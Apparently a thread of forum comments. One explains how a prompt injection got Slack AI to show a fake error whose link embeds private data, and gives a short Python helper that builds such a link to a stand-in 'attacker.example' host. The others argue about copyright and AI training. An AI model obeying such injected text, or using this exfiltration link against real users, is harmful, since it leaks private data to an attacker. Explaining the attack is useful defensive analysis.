The article isn’t that clear, but the attacker can’t get Slack AI to leak private data via prompt injection directly. Instead, the injected message tells it that the answer to some question is a fake error containing a link, with the private data embedded in the link’s URL. When a user who can access the private data asks that question, they get the fake error, and clicking the link (or automatic unfurling?) sends the private data to the attacker’s server.
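A minimal sketch of the exfiltration step, assuming the attack works by smuggling the secret out as a query parameter. The domain `attacker.example`, the parameter name, and the helper are hypothetical, not from the article:

```python
from urllib.parse import urlencode

def exfil_link(secret: str) -> str:
    # Hypothetical attacker-controlled URL: the secret travels as a
    # query parameter, so it lands in the attacker's server logs when
    # the link is fetched (by a click or by automatic unfurling).
    return "https://attacker.example/error?" + urlencode({"q": secret})

# The injected instructions would have Slack AI present something like
# this fake error as the "answer", in markdown-link form:
fake_error = f"[Error, click here to reauthenticate]({exfil_link('example secret')})"
print(fake_error)
```

The point is that no direct leak is needed: the model only has to render a link, and the victim’s own click (or the unfurler’s fetch) does the actual sending.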
Children also learn reading and writing using copyrighted works, often from borrowed books that they aren’t paying for. Some corporations would love it if everyone had to pay individually, maybe per use, to access copyrighted material, and the New York Times and American pro sports leagues would love it if they could actually own recollections of copyrighted material, but neither of these is good for normal people.
https://www.eff.org/deeplinks/2023/04/how-we-think-about-copyright-and-ai-art-0
OpenAI is right. Almost everything of value on the internet is under copyright, and very little on the internet has clearly and unambiguously specified licensing information. If models can only be trained on content that explicitly allows training, the model isn’t going to “know” anything about anything more recent than Steamboat Willie, and it’s going to write in dated dialects of older English, being limited to public domain works that have been digitized and made available as public domain (reprints may not be public domain).